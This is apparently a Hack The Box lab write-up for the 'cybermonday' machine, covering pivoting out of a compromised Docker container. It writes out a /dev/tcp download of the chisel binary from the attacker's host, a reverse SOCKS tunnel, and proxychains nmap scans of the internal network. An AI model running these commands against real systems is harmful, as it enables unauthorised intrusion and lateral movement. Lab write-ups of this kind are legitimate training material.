Accessment
Upon gaining a foothold;
- system enumeration attempt was made
- Docker container
- the
/mntdirectory is mapped to the home directory of a user in the host filesystem- the
johnuser is a valid system user, enumerated from/mnt/.ssh/authorized_keys
- the
- The
createLogFileaction on the webhook API endpoint can be used to write to the/mnt/logsdirectory- unable to proceed forward
Due to the assessment made above, I will attempt to perform a network scan since the current docker container doesn’t have tools that i need, i will create a reverse socks proxy using, chisel and proxychains
Reverse Socks Proxy
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ nc -lvp 2222 < /home/kali/Tools/Chisel_1.7.7/chiselx64
listening on [any] 2222 ...
connect to [10.10.14.12] from cybermonday.htb [10.10.11.228] 39948
www-data@070370e2cdc4:/tmp$ cat < /dev/tcp/10.10.14.12/2222 > chiselx64
www-data@070370e2cdc4:/tmp$ chmod 755 ./chiselx64Delivery complete
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ chisel server -p 55555 --reverse
2023/08/22 20:11:56 server: Reverse tunnelling enabled
2023/08/22 20:11:56 server: Fingerprint PSBeKE3cY8gMEMOec62HVPWh1n5xdToMlxwm02fQ4VU=
2023/08/22 20:11:56 server: Listening on http://0.0.0.0:55555Start the Chisel server on the Kali port 55555
From Kali, I need append the configured reverse socks proxy at the bottom of the /etc/proxychains4.conf file
www-data@070370e2cdc4:/tmp$ ./chiselx64 client 10.10.14.12:55555 R:48823:socks &
[1] 1440x64 client 10.10.14.12:55555 R:48823:socks &
www-data@070370e2cdc4:/tmp$ 2023/08/22 18:13:09 client: Connecting to ws://10.10.14.12:55555
2023/08/22 18:13:09 client: Connected (Latency 26.322678ms)The command above will bind the port 48823 of the Docker host to the Kali’s socks proxy, effectively creating a reverse socks proxy
Connected
Pivoting
www-data@070370e2cdc4:/tmp$ ./cdk ifconfig
2023/08/22 18:14:38 [+] run ifconfig, using GetLocalAddresses()
2023/08/22 18:14:38 lo 127.0.0.1/8
2023/08/22 18:14:38 eth0 172.18.0.5/16[[Cybermonday_Automated_Docker#[CDK](https //github.com/cdk-team/CDK) - Zero Dependency Container Penetration Toolkit|CDK]] has a built-in ifconfig that I can use to check the network configuration
The connected network is 172.18.0.5/16
While there are a total of 65,534 possible hosts, 172.18.0.1-4 appears to be most possible candidates since the current docker host has the IP address of 172.18.0.5
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q nmap -top-ports 100 172.18.0.1-4
starting nmap 7.94 ( https://nmap.org ) at 2023-08-22 20:48 CEST
Nmap scan report for 172.18.0.1
Host is up (0.080s latency).
not shown: 98 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.18.0.2
Host is up (0.080s latency).
All 100 scanned ports on 172.18.0.2 are in ignored states.
not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.3
Host is up (0.080s latency).
not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.18.0.4
Host is up (0.080s latency).
not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
nmap done: 4 IP addresses (4 hosts up) scanned in 32.61 secondsThe 172.18.0.1 host appears to be the main host as it matches the outputs of the initial Recon
Both 172.18.0.3 and 172.18.0.4 seem to be hosting web services
172.18.0.1 and 172.18.0.4
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q curl http://172.18.0.1 -I
HTTP/1.1 301 Moved Permanently
Server: nginx/1.25.1
Date: Tue, 22 Aug 2023 18:51:59 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: http://cybermonday.htb
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q curl http://172.18.0.3 -I
HTTP/1.1 301 Moved Permanently
Server: nginx/1.25.1
Date: Tue, 22 Aug 2023 18:51:56 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: http://cybermonday.htbBoth 172.18.0.1(or 10.10.11.228) and 172.18.0.3 seem to be running the same Laravel web app
172.18.0.4
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q curl http://172.18.0.4 -I
HTTP/1.1 200 OK
host: 172.18.0.4
date: Tue, 22 Aug 2023 18:52:45 GMT
connection: close
x-powered-by: PHP/8.2.7
set-cookie: PHPSESSID=1a1470ac78f099292e25f8596084dc15; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-type: text/html; charset=UTF-8
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl http://webhooks-api-beta.cybermonday.htb/ -I
HTTP/1.1 200 OK
server: nginx/1.25.1
date: Tue, 22 Aug 2023 18:53:01 GMT
content-type: text/html; charset=UTF-8
connection: keep-alive
host: webhooks-api-beta.cybermonday.htb
x-powered-by: PHP/8.2.7
set-cookie: PHPSESSID=c0c7e19e78d4ac923accbf4149fcc3d5; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cacheWhereas, the 172.18.0.4 host appears to be the one hosting the API web app from the virtual host; webhooks-api-beta.cybermonday.htb
Remaining
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q nmap -sn -T5 --min-parallelism 100 --max-parallelism 256 172.18.0.5/16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-22 20:58 CEST
Debugging Increased to 1.
Debugging Increased to 2.
ultrascan_host_probe_update called for machine 172.18.2.86 state UNKNOWN -> HOST_UP (trynum 0 time: 3136716)
Changing ping technique for 172.18.2.86 to connect to port 80
Changing global ping host to 172.18.2.86.
Stats: 2:37:41 elapsed; 0 hosts completed (0 up), 4096 undergoing Ping ScanAttempting to scan the remaining failed as it would take forever
Tip
So I have been tipped off that other hosts are within the range of 172.18.0.1-10
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q nmap -top-ports 100 172.18.0.1-10
starting nmap 7.94 ( https://nmap.org ) at 2023-08-22 23:58 CEST
Nmap scan report for 172.18.0.1
Host is up (0.082s latency).
not shown: 98 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.18.0.2
Host is up (0.081s latency).
All 100 scanned ports on 172.18.0.2 are in ignored states.
not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.3
Host is up (0.082s latency).
not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.18.0.4
Host is up (0.082s latency).
not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.18.0.5
Host is up (0.081s latency).
All 100 scanned ports on 172.18.0.5 are in ignored states.
not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.6
Host is up (0.080s latency).
not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
3306/tcp open mysql
Nmap scan report for 172.18.0.7
Host is up (0.082s latency).
not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
5000/tcp open upnp
Nmap scan report for 172.18.0.8
Host is up (3.1s latency).
All 100 scanned ports on 172.18.0.8 are in ignored states.
not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.9
Host is up (3.1s latency).
All 100 scanned ports on 172.18.0.9 are in ignored states.
not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.10
Host is up (3.1s latency).
All 100 scanned ports on 172.18.0.10 are in ignored states.
not shown: 100 closed tcp ports (conn-refused)
nmap done: 10 IP addresses (10 hosts up) scanned in 58.12 seconds2 Additional hosts with service discovered
- 172.18.0.6:3306
- 172.18.0.7:5000